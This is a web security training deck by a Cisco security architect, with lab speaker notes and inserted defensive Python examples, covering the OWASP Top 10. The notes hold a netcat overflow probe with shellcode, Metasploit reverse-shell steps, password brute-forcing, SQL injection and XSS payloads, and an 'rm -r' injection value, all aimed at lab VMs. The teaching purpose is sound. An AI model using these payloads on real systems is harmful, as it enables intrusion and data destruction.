Web Security Martin Nystrom, CISSP Security Architect


1 Web Security
Martin Nystrom, CISSP, Security Architect
Cisco Systems, Inc.

2 Who am I?
- Security Architect in Cisco's InfoSec
- Responsible for consulting with application teams to secure their architecture
- Monitor for infrastructure vulnerabilities
- Infrastructure security architect
- 12 years developing application architectures
- Java programmer
- Master of Engineering, NC State University
- Bachelor's, Iowa State University (1990)

3 Why worry?
- Guess.com sanctioned by FTC for exposing private information: "…permitting anyone able to construct a properly-crafted URL to pull down every name, credit card number and expiration date in the site's customer database."
- U.S. Army systems hacked using WebDAV vulnerability in IIS: "…it was a disturbingly successful attack, experts say, because the intruder found and exploited a flaw that took security researchers completely by surprise."
- Millions of credit card numbers compromised at Data Processors International: "All indications are the attack on this company's (Internet) address came from the outside, and efforts continue to analyze this attack to see if it could be traced to the attacker," the investigator said.
- Utah ISP is victim of retaliation following hackers' attack on Al-Jazeera: "…impersonating an Al-Jazeera employee, tricked the Web addressing company Network Solutions into making technical changes that effectively turned over temporary control of the network's Arabic and English Web sites…"
- What would you do?
Notes:
- WebDAV / US Army article:
- UTexas article:
- DPI article: "…A hacker who recently gained access to millions of credit card numbers appears to have done it by breaking into a computer system at a company that processes transactions for catalog companies and other direct marketers."
- Kevin Mitnick's site hacked: "…A hacker calling himself "BugBear" added one page to Mitnick's corporate Web site on January 30 with a message, "Welcome back to freedom, Mr. Kevin," and added that "it was fun and easy to break into your box." He included a photograph of a polar bear with two cubs."

4 Why worry? (cont.) Note the rate of growth in incidents.

5 The goal of an attack
- Steal data
- Blackmail
- Beachhead for other attacks
- Bragging rights
- Vandalism
- Demonstrate vulnerability / satisfy curiosity
- Damage company reputation
Notes:
- What do you need for a credit card attack to be successful? How can you program that to make it more secure?
- Beachhead: to avoid detection, hop onto multiple servers in multiple countries to route your attack. Example: route your attack through N. Korea or China.
- Bragging rights:
- Vandalism: Al-Jazeera site
- Embarrass:

6 A word of warning
- These tools and techniques can be dangerous
- The difference between a hacker and a cracker is… permission
- Admins will see strange activity in logs, and come looking for you
- Authorities are prosecuting even the "good guys" for using these tools

7 Commonly attacked services
- SMTP servers (port 25): sendmail. "The address parser performs insufficient bounds checking in certain conditions due to a char to int conversion, making it possible for an attacker to take control of the application."
- RPC servers (port 111 and others)
- NetBIOS shares (ports 135, 139, 445): Blaster worm, Sasser worm
- FTP servers (ports 20, 21): wuftpd vulnerabilities
- SSH servers (port 22): OpenSSH, PAM vulnerabilities
- Web servers (ports 80, 443): Apache chunked encoding vulnerability
Notes:
- Sendmail:
- NetBIOS / Blaster worm:
- RPC:
- FTP: wuftpd vulnerability
- SSH: OpenSSH vulnerability. Privilege separation: "The basic idea behind privilege separation is that OpenSSH sshd(8) has something like lines of code. A lot of them run as root. However, when UsePrivilegeSeparation is enabled, the daemon splits into two parts. A part containing about 2500 lines of code remains as root, and the rest of the code is shoved into a chroot-jail without any privileges. This makes the daemon less vulnerable to attack."
- HTTP: Apache exploit code:

8 Web server attack
- Scan to find open ports
- Find out what's running on open ports (banner grabbing)
- Profile the server
  - Windows (look for Kerberos, NetBIOS, AD)
  - Unix
  - Use TCP fingerprinting
- Probe for weaknesses on interesting ports
  - Default configuration files and settings (e.g. popular IIS ones)
  - Buffer overflows
  - Insecure applications
- Launch attack
  - Use exploit code from Internet…
  - …or build your own
Notes:
- WebDAV exploit:
- Compiled exploit:

9 Scanning… What O/S is this system?
Active Directory ports (3268, 3269) and DNS indicate that this is a Windows server, probably a domain controller.

10 Scanning… What O/S is this system?
Show nmap scan against linuxvm, which makes a guess at the remote O/S. This is Linux; note that port 111 is open.

11 Example Web Application
Architecture diagram (labels recovered from the slide):
Zones: Internet | DMZ | Protected network | Internal network
Web client (IE, Mozilla, etc.)
  --HTTP request, clear-text or SSL--> Web server (Apache, IIS, Netscape, etc.)
  --AJP, IIOP, T9, etc.--> App server, optional (J2EE server, ColdFusion, Oracle 9iAS, etc.)
    hosting web apps (Perl, C++, CGI, Java, ASP, PHP, etc.)
  --DB transport (ADO, ODBC, JDBC, etc.)--> DB (Oracle, SQL Server, etc.)
  <--HTTP reply (HTML, JavaScript, VBScript, etc.)-- back to the web client

12 OWASP Top 10 Web Application Security Vulnerabilities
1. Unvalidated parameters
2. Broken access control
3. Broken account/session management
4. Cross-site scripting flaws
5. Buffer overflows
6. Command injection flaws
7. Error handling problems
8. Insecure use of cryptography
9. Remote administration flaws
10. Web and app server mis-configuration

13 Principles
- Turn off un-needed services
- Keep systems patched
- Don't trust input
- Watch for logic holes
- Only provide the necessary information
- Hide sensitive information
  - Encryption
  - Access controls

14 #1: Unvalidated Parameters
- Attacker can easily change any part of the HTTP request before submitting
  - URL
  - Cookies
  - Form fields
  - Hidden fields
  - Headers
- Encoding is not encrypting
- Input must be validated on the server (not just the client)
- Countermeasures
  - Tainting (Perl)
  - Code reviews (check variable against list of allowed values, not vice-versa)
  - Application firewalls (CodeSeeker)
  - Real-time auditing
Notes:
- Toasted Spam:
- CoolCarts:
- CodeSeeker:
- Real-time auditing:
- Input validation demo: edit hidden values on form. Remember to modify action on the form too (replace /cgi-bin with
- Re-open in browser and click "Preview total". Do NOT submit order.
- Encoding/encrypting demo:
  1) Start linuxvm
  2) Open Sleuth
  3) Set Intercept and have it break on all responses
  4) Browse to
  Basic auth for manager/manager in Tomcat manager app: bWFuYWdlcjptYW5hZ2Vy
  Use this tool for decoding:
  Or use this tool: java -classpath c:\javalib\dnsjava\dnsjava jar;c:\dev\Base64Decoder\classes Base64 decode <text>
- Alternative to test against unvalidated parameters: go to "Hidden field tampering", save page to disk, open page in TextPad, search for "price" and change price, search for "action" and change action to
  Open page in browser and click "purchase".
- Notes on Perl tainting: #!/usr/local/bin/perl -T
  The only way to untaint a variable is to do a regular expression match using () groups inside the regular expression pattern match. In Perl, the first () group match gets assigned to $1, the second () group to $2, and so on. Perl considers these new variables that arise from () groups to be untainted. Once your regular expression has created these variables, you can use them as your new untainted values.
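Two points from this slide worked in code, as an added example that is not part of the deck: the Basic auth header from the Tomcat demo decodes with nothing more than Base64, and a server that wants a tamper-proof order total must look the price up itself rather than read it back from a hidden field. The catalogue, field names and quantity limit are constructed for the example.

```python
import base64
import binascii

# Constructed sample request header; the Base64 value is the one the slide
# notes quote for manager/manager against the Tomcat manager app.
SAMPLE_AUTH_HEADER = "Basic bWFuYWdlcjptYW5hZ2Vy"

def decode_basic_auth(header_value):
    """Basic auth is Base64-encoded, not encrypted: anyone who sees the
    header recovers the credentials. Returns (user, password) or None."""
    scheme, _, token = header_value.partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        raw = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    user, sep, password = raw.partition(":")
    return (user, password) if sep else None

# Constructed server-side catalogue, prices in cents. The browser only names
# an item; the server looks the price up itself and never trusts a price
# field, hidden or otherwise, that arrived with the request.
CATALOGUE = {"widget": 1999, "gadget": 4999}

def order_total(form):
    """Positive validation of the POSTed fields: the item must be in the
    allow-list and the quantity a small integer. Any client-supplied
    'price' field is ignored. Raises ValueError on bad input."""
    item = form.get("item", "")
    if item not in CATALOGUE:
        raise ValueError("unknown item")
    qty_text = form.get("qty", "")
    if not (qty_text.isdigit() and 1 <= int(qty_text) <= 100):
        raise ValueError("quantity out of range")
    return CATALOGUE[item] * int(qty_text)
```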

15 #2: Broken Access Control
- Usually inconsistently defined/applied
- Examples
  - Forced browsing past access control checks
  - Path traversal
  - File permissions: may allow access to config/password files
  - Client-side caching
- Countermeasures
  - Use non-programmatic controls
  - Verify access control via central container
  - Code reviews
Notes:
- Open
- Go to "Weak Authentication Cookie"
- Use Sleuth, set Intercept to stop on AuthCookie
- Log in as dave/dave
- Observe pattern for cookie encoding (encoding is backwards twice + advance one letter)
- Log in as jeff/jeff in another browser (requires session hijacking)
- Change AuthCookie to "ggfkggfk" for Jeff: AuthCookie=ggfkggfk;
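Why the demo cookie is forgeable, and what replaces it, as an added example rather than code from the deck or from WebGoat: the first function reconstructs the encoding the notes describe (reverse the credentials, advance each character by one) and reproduces the "ggfkggfk" value for jeff/jeff; the session store below it is the assumed fix, a random token with no structure to reverse and the user mapping held server-side.

```python
import secrets

def weak_auth_cookie(username, password):
    """Reconstruction of the scheme the notes describe (constructed here to
    show the flaw): concatenate the credentials, reverse the string and
    advance every character by one. There is no secret involved, so anyone
    who spots the pattern can mint a valid cookie for any other user
    without knowing that user's password."""
    reversed_creds = (username + password)[::-1]
    return "".join(chr(ord(c) + 1) for c in reversed_creds)

class SessionStore:
    """Replacement pattern: the cookie carries only a random token, and the
    user it belongs to is kept server-side. Forging a cookie then means
    guessing 256 random bits rather than reversing an encoding."""

    def __init__(self):
        self._sessions = {}

    def login(self, username):
        token = secrets.token_urlsafe(32)
        self._sessions[token] = username
        return token

    def user_for(self, token):
        # Unknown or forged tokens map to no user at all.
        return self._sessions.get(token)

    def logout(self, token):
        self._sessions.pop(token, None)
```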

16 #3: Broken Account and Session Management
- Weak authentication
  - Password-only
  - Easily guessable usernames (admin, etc.)
  - Unencrypted secrets are sniffable
- How to break in
  - Guess/reset password
  - Have app send you a new password
  - Sniff or crack password
- Backend authentication
  - How are database passwords stored?
  - Trust relationships between hosts (IP address can be spoofed, etc.)
- Countermeasures
  - Strong passwords
  - Remove default user names
  - Protect sensitive files
Notes:
- Use Brutus to guess manager password; show how it could be used to break into admin account. Target: linuxvm/manager/html, Port: 8080, Type: HTTP (Basic Auth), Method: HEAD, Use Username checked, Single User checked, Userid=manager. BREAK IN.
- Show sniffer in win2kvm
- Brute force crackers:
- Show passwords, database stuff at:

17 #4: Cross-Site Scripting (XSS)
- Attacker uses trusted application/company to reflect malicious code to end-user
- Attacker can "hide" the malicious code: Unicode encoding
- 2 types of attacks: stored, reflected
- Wide-spread problem!
- Countermeasures
  - Input validation
    - Positive
    - Negative: "< > ( ) # &"; don't forget these: "&lt &gt &#40 &#41 &#35 &#38"
  - User/customer education
Notes:
- Stored example: go to Database XSS example, and store the following in the message field: <script language="javascript" type="text/javascript">alert("Ha Ha Ha");</script>
- For reflected attack, add the above line to
- Example of what this can do: CitiBank phishing scam:
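The two countermeasures side by side, as an added example (not from the deck): output encoding covering the characters the slide lists, checked against the stored-XSS payload from the notes, and a positive allow-list for the message field. The entity table and the message pattern are the example's own assumptions.

```python
import re

# Stored-XSS payload quoted in the slide notes, used as constructed input.
PAYLOAD = ('<script language="javascript" type="text/javascript">'
           'alert("Ha Ha Ha");</script>')

# The characters the slide lists for filtering, plus both quote characters,
# mapped to entity references so they can no longer open or close a tag,
# an attribute or a script call once written into the page.
ENTITIES = {"&": "&#38;", "<": "&lt;", ">": "&gt;", "(": "&#40;",
            ")": "&#41;", "#": "&#35;", '"': "&#34;", "'": "&#39;"}

def encode_for_html(text):
    """Output encoding applied whenever stored user text is written into
    HTML. Encoding '&' as well means an attacker who submits the entity
    forms the slide warns about ('&lt', '&#40', ...) gets them displayed
    literally instead of decoded by the browser."""
    return "".join(ENTITIES.get(ch, ch) for ch in text)

# Positive validation for a message-board field: letters, digits, spaces
# and a little punctuation, bounded in length. Everything else is rejected
# rather than trying to enumerate every dangerous character.
MESSAGE_RE = re.compile(r"[A-Za-z0-9 .,!?'-]{1,200}")

def validate_message(text):
    return MESSAGE_RE.fullmatch(text) is not None
```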

18 #5: Buffer Overflows
- Mostly affects web/app servers
- Can affect apps/libraries too
- Goal: crash the target app and get a shell
- Buffer overflow example: echo "vrfy `perl -e 'print "a" x 1000'`" | nc 25
  Replace all those "a"s with something like this… char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08…"
- Countermeasures
  - Keep up with bug reports/patches
  - Code reviews
  - Run with limited privileges
  - Use "safer" languages like Java
Notes:
- C:\eviltools\overflow-example\Smasher.html: enter DDDDDDDDDDD (11 D's)
- You can look up the ASCII function call with…
- Example against IIS:
- Java security (quoted from a Slashdot comment by quantum bit, "Re: Speed issues aside"):
  - No buffer overflows without throwing an exception and crashing the program
  - No dereferencing of null pointers without crashing the program (java.lang.NullPointerException)
  - No object creation failures (all "new"s succeed)
  - Automatic bounds checking
  - Exception handling
- Buffer overflow attack against win2kvm
  - Make sure web server is running on win2kvm (Start/Programs/Administrative Tools/Internet Services Manager)
  - Launch Metasploit Framework:
    setg RHOST win2kvm
    setg LHOST
    setg PAYLOAD winreverse
    use exploit iis50_nsiislog_post
    check
    show targets
    set TARGET 0
    setg LPORT 52000
    exploit

19 #6: Command Injection
- Allows attacker to relay malicious code in form variables or URL
  - System commands
  - SQL
  - Interpreted code (Perl, Python, etc.)
- Many apps use calls to external programs (sendmail)
- Examples
  - Path traversal: "../"
  - Add more commands: "; rm -r *"
  - SQL injection: "' OR 1=1"
- Countermeasures
  - Taint all input
  - Avoid system calls (use libraries instead)
  - Run with limited privileges
Notes:
- SQL injection example: go to
- Generate error by putting a quote at the end of the user name and a simple password.
- Try username = ' or username like 's%' and note that the password is wrong.
- Try ' or username like 's%' or '-- for username with password = anything. You are now logged in as sam speed.
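The SQL injection demo from the notes reproduced against an in-memory SQLite table, as an added example that is not the deck's or WebGoat's code: the concatenated query logs the attacker in as "sam speed" with the password commented out, while the parameterised query treats the same input as a literal username and matches nothing. The table contents and the comment form of the payload are constructed for the example.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the demo application's user table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT, fullname TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [("sam", "s3cret", "sam speed"), ("dave", "dave", "dave")])
    return db

def login_vulnerable(db, username, password):
    """Query built by string concatenation, as in the demo. A quote in the
    username ends the string literal, the rest of the input becomes SQL,
    and '--' comments out the password check entirely."""
    sql = ("SELECT fullname FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(db, username, password):
    """Parameterised query: the driver passes the input as data, so the
    same payload is compared literally against the username column and
    matches no row."""
    row = db.execute(
        "SELECT fullname FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None

# Payload in the form the notes describe: the quote closes the literal, the
# LIKE clause matches any user starting with 's', the comment drops the rest.
INJECTION = "' or username like 's%' --"
```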

20 #7: Error Handling
- Examples: stack traces, DB dumps
- Helps attacker know how to target the app
- Inconsistencies can be revealing too: "File not found" vs. "Access denied"
- Fail-open errors
- Need to give enough info to user without giving too much info to attacker
- Countermeasures
  - Code review
  - Modify default error pages (404, 401, etc.)
Notes:
- Fail-open auth example is…
- Won't work with passwords, but if you try it _without_ a password, it lets you in. Show sample code.
- Show 401 error message on after logging in; shows "plsql" in path.
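The fail-open pattern from the notes beside its default-deny form, as an added example (the demo's own sample code is not on the page, so the bug is reconstructed from the description). The credential store and hashing are constructed stand-ins.

```python
import hashlib
import hmac

# Constructed credential store: username -> hex SHA-256 of the password
# (a stand-in for the demo app's real store; see the cryptography slide).
USERS = {"dave": hashlib.sha256(b"dave").hexdigest()}

def password_ok(username, password):
    digest = hashlib.sha256(password.encode()).hexdigest()
    return hmac.compare_digest(USERS.get(username, ""), digest)

def authenticate_fail_open(username, password):
    """The bug pattern the notes describe: the code denies only when a
    password is present and wrong. A request with no password skips the
    check and falls through to the 'allowed' default."""
    authorized = True
    if password:
        if not password_ok(username, password):
            authorized = False
    return authorized

def authenticate_fail_closed(username, password):
    """Default deny: the only path to True is a verified credential, and any
    missing input or unexpected error leaves the caller unauthenticated."""
    try:
        if not username or not password:
            return False
        return password_ok(username, password)
    except Exception:
        return False
```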

21 Error messages example

22 #8: Poor Cryptography
- Insecure storage of credit cards, passwords, etc.
- Poor choice of algorithm (or invent your own)
- Poor randomness: session IDs, tokens, cookies
- Improper storage in memory
- Countermeasures
  - Store only what you must
  - Store a hash instead of the full value (SHA-1)
  - Use only vetted, public cryptography
Notes:
- Demonstrate md5 tool on Windows XP laptop with: md5 -dhello, md5 -djello
- Demonstrate encryption with PGP: pgp -e /home/mnystrom/example.txt mnystrom (produces example.txt.pgp), then pgp /home/mnystrom/example.txt.pgp
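The hello/jello demo and the "store a hash" countermeasure in code, as an added example that goes one step past the slide: the plain digest shows the avalanche effect, and the password store uses a salted, iterated hash (PBKDF2-HMAC-SHA256, an addition to the slide's plain SHA-1) so equal passwords do not produce equal records. The record format and iteration count are the example's own choices.

```python
import hashlib
import hmac
import os

def digest_hex(algorithm, text):
    """The slide's demo: hash 'hello' and 'jello' and compare. A single
    changed character gives an unrelated digest, and the original value
    cannot be recovered from the stored digest."""
    return hashlib.new(algorithm, text.encode()).hexdigest()

ITERATIONS = 200_000

def store_password(password, salt=None):
    """Beyond the slide's plain SHA-1: PBKDF2-HMAC-SHA256 with a random
    16-byte salt. The salt makes equal passwords store differently and the
    iteration count makes each guess expensive. Returns 'salt$digest'."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt.hex() + "$" + digest.hex()

def verify_password(password, record):
    salt_hex, _, stored_hex = record.partition("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), ITERATIONS)
    # Constant-time comparison so timing does not leak how much matched.
    return hmac.compare_digest(digest.hex(), stored_hex)
```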

23 #9: Remote Administration Flaws
- Problems
  - Weak authentication (username="admin")
  - Weak encryption
- Countermeasures
  - Don't place admin interface on same server
  - Use strong authentication: certificates, tokens, strong passwords, etc.
  - Encrypt entire session (VPN or SSL)
  - Control who has accounts
  - IP restrictions
Notes:
- Example:
- Example ColdFusion:

24 #10: Web/App Server Misconfiguration
- Tension between "work out of the box" and "use only what you need"
- Developers ≠ web masters
- Examples
  - Unpatched security flaws (BID example)
  - Misconfigurations that allow directory traversal
  - Administrative services accessible
  - Default accounts/passwords
- Countermeasures
  - Create and use hardening guides
  - Turn off all unused services
  - Set up and audit roles, permissions, and accounts
  - Set up logging and alerts
Notes:
- Oracle 9iAS examples:
- IIS hardening guide: C:\Documents and Settings\mnystrom\My Documents\InfoSec\Technical Reference NT IIS 5_0 and Win2K Hardening Configuration.htm
- Apache hardening guide: C:\Documents and Settings\mnystrom\My Documents\InfoSec\Apache hardening guide.doc
- Examples: show how an administrator might want to change admin web site properties. For Admin web server, select "Directory Security/IP address and domain name restrictions/Edit…"

25 Principles
- Turn off un-needed services
- Keep systems patched
- Don't trust input
- Watch for logic holes
- Only provide the necessary information
- Hide sensitive information
  - Encryption
  - Access controls

26 Tools used in this preso
- WebGoat: vulnerable web applications for demonstration
- VMWare: runs Linux and Windows 2000 virtual machines on demo laptop
- nmap: host/port scanning to find vulnerable hosts
- Ethereal: network traffic sniffing
- Metasploit Framework: exploit tool
- Brutus: password cracking
- Sleuth: HTTP mangling against web sites
